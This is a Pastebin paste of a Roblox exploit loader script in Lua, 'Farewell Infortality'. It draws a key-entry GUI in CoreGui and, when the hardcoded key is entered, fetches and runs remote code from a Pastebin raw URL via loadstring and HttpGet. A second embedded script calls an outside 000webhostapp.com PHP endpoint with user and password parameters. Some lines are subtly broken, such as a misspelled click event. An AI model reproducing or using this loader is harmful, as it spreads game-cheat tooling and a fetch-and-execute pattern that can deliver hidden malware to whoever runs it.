Advertisement
Guest User

Untitled

a guest
Apr 16th, 2019
136
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.15 KB | None | 0 0
  1. -- Farewell Infortality.
  2. -- Version: 2.82
  3. -- Instances:
  4. local Loader = Instance.new("ScreenGui")
  5. local VerifyLabel = Instance.new("ImageLabel")
  6. local VerifyBorderLabel = Instance.new("ImageLabel")
  7. local ImageLabel = Instance.new("ImageLabel")
  8. local VerfiySubmit = Instance.new("ImageLabel")
  9. local TextButton = Instance.new("TextButton")
  10. local WhitelistKey = Instance.new("ImageLabel")
  11. local TextBox = Instance.new("TextBox")
  12. --Properties:
  13. Loader.Name = "Loader"
  14. Loader.Parent = game.CoreGui
  15.  
  16. VerifyLabel.Name = "VerifyLabel"
  17. VerifyLabel.Parent = Loader
  18. VerifyLabel.Active = true
  19. VerifyLabel.BackgroundColor3 = Color3.new(0, 0, 0)
  20. VerifyLabel.BackgroundTransparency = 1
  21. VerifyLabel.BorderSizePixel = 6
  22. VerifyLabel.Position = UDim2.new(0.364654362, 0, 0.194300875, 0)
  23. VerifyLabel.Size = UDim2.new(0, 600, 0, 401)
  24. VerifyLabel.Visible = true
  25. VerifyLabel.Image = "rbxassetid://605740338"
  26. VerifyLabel.ImageColor3 = Color3.new(0.262745, 0.262745, 0.262745)
  27. VerifyLabel.ScaleType = Enum.ScaleType.Slice
  28. VerifyLabel.SliceCenter = Rect.new(24, 24, 216, 216)
  29.  
  30. VerifyBorderLabel.Name = "VerifyBorderLabel"
  31. VerifyBorderLabel.Parent = VerifyLabel
  32. VerifyBorderLabel.Active = true
  33. VerifyBorderLabel.BackgroundColor3 = Color3.new(0, 0, 0)
  34. VerifyBorderLabel.BackgroundTransparency = 1
  35. VerifyBorderLabel.BorderSizePixel = 6
  36. VerifyBorderLabel.Position = UDim2.new(0.00999999978, 0, 0.0149999997, 0)
  37. VerifyBorderLabel.Size = UDim2.new(0, 588, 0, 388)
  38. VerifyBorderLabel.Image = "rbxassetid://605740338"
  39. VerifyBorderLabel.ImageColor3 = Color3.new(0.0705882, 0.0705882, 0.0705882)
  40. VerifyBorderLabel.ScaleType = Enum.ScaleType.Slice
  41. VerifyBorderLabel.SliceCenter = Rect.new(24, 24, 216, 216)
  42.  
  43. ImageLabel.Parent = VerifyBorderLabel
  44. ImageLabel.BackgroundColor3 = Color3.new(0.0705882, 0.0705882, 0.0705882)
  45. ImageLabel.BackgroundTransparency = 1
  46. ImageLabel.Position = UDim2.new(0.341836751, 0, -1.49011612e-08, 0)
  47. ImageLabel.Size = UDim2.new(0, 200, 0, 170)
  48. ImageLabel.Image = "rbxassetid://3078932121"
  49.  
  50. VerfiySubmit.Name = "VerfiySubmit"
  51. VerfiySubmit.Parent = VerifyBorderLabel
  52. VerfiySubmit.Active = true
  53. VerfiySubmit.BackgroundColor3 = Color3.new(0, 0, 0)
  54. VerfiySubmit.BackgroundTransparency = 1
  55. VerfiySubmit.BorderSizePixel = 6
  56. VerfiySubmit.Position = UDim2.new(0.25, 0, 0.790773213, 0)
  57. VerfiySubmit.Size = UDim2.new(0, 294, 0, 60)
  58. VerfiySubmit.Image = "rbxassetid://605740338"
  59. VerfiySubmit.ImageColor3 = Color3.new(0.262745, 0.262745, 0.262745)
  60. VerfiySubmit.ScaleType = Enum.ScaleType.Slice
  61. VerfiySubmit.SliceCenter = Rect.new(24, 24, 216, 216)
  62. VerfiySubmit.MouseButton1Click:Connect(function()
  63. if WhitelistKey.Text == "OH#HEROKU#GAY#YAY#LOL" then
  64. Loader.VerifyLabel:Destroy()
  65. loadstring(game:HttpGet("https://pastebin.com/raw/c5KXVePM",true))()
  66. end
  67. end)
  68.  
  69. TextButton.Parent = VerfiySubmit
  70. TextButton.BackgroundColor3 = Color3.new(1, 1, 1)
  71. TextButton.BackgroundTransparency = 1.039999961853
  72. TextButton.Size = UDim2.new(0, 294, 0, 60)
  73. TextButton.Font = Enum.Font.GothamBlack
  74. TextButton.Text = "Submit"
  75. TextButton.TextColor3 = Color3.new(1, 1, 1)
  76. TextButton.TextSize = 35
  77. TextButton.TextWrapped = true
  78.  
  79. WhitelistKey.Name = "WhitelistKey"
  80. WhitelistKey.Parent = VerifyBorderLabel
  81. WhitelistKey.Active = true
  82. WhitelistKey.BackgroundColor3 = Color3.new(0, 0, 0)
  83. WhitelistKey.BackgroundTransparency = 1
  84. WhitelistKey.BorderSizePixel = 6
  85. WhitelistKey.Position = UDim2.new(0.0425170064, 0, 0.535618603, 0)
  86. WhitelistKey.Size = UDim2.new(0, 538, 0, 60)
  87. WhitelistKey.Image = "rbxassetid://605740338"
  88. WhitelistKey.ImageColor3 = Color3.new(0.262745, 0.262745, 0.262745)
  89. WhitelistKey.ScaleType = Enum.ScaleType.Slice
  90. WhitelistKey.SliceCenter = Rect.new(24, 24, 216, 216)
  91.  
  92. TextBox.Parent = WhitelistKey
  93. TextBox.BackgroundColor3 = Color3.new(1, 1, 1)
  94. TextBox.BackgroundTransparency = 1
  95. TextBox.Size = UDim2.new(0, 538, 0, 60)
  96. TextBox.Font = Enum.Font.GothamBlack
  97. TextBox.Text = "Enter the Key i gave you in the Thread!"
  98. TextBox.TextColor3 = Color3.new(1, 1, 1)
  99. TextBox.TextSize = 25
  100. -- Scripts:
  101. function SCRIPT_ZEIG71_FAKESCRIPT() -- ImageLabel.Script
  102. local script = Instance.new('Script')
  103. script.Parent = ImageLabel
  104. function zigzag(X) return math.acos(math.cos(X*math.pi))/math.pi end
  105.  
  106. counter = 0
  107.  
  108. while wait(0.1)do
  109. script.Parent.ImageColor3 = Color3.fromHSV(zigzag(counter),1,1)
  110.  
  111. counter = counter + 0.01
  112. end
  113.  
  114. end
  115. coroutine.resume(coroutine.create(SCRIPT_ZEIG71_FAKESCRIPT))
  116. function SCRIPT_HQTB80_FAKESCRIPT() -- TextButton.Script
  117. local script = Instance.new('Script')
  118. script.Parent = TextButton
  119. WhitelistKey.Mousebutton1Click:Connect(function()
  120. game:GetService("HttpService"):GetAsync("http://skidwarecbr.000webhostapp.com/NAME.php?user=test&pass=test&script=SCRIPTHERE")
  121. end)
  122.  
  123. end
  124. coroutine.resume(coroutine.create(SCRIPT_HQTB80_FAKESCRIPT))
  125. function SCRIPT_IBGV79_FAKESCRIPT() -- VerifyLabel.Script
  126. local script = Instance.new('Script')
  127. script.Parent = VerifyLabel
  128. function zigzag(X) return math.acos(math.cos(X*math.pi))/math.pi end
  129.  
  130. counter = 0
  131.  
  132. while wait(0.1)do
  133. script.Parent.ImageColor3 = Color3.fromHSV(zigzag(counter),1,1)
  134.  
  135. counter = counter + 0.01
  136. end
  137.  
  138. end
  139. coroutine.resume(coroutine.create(SCRIPT_IBGV79_FAKESCRIPT))
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement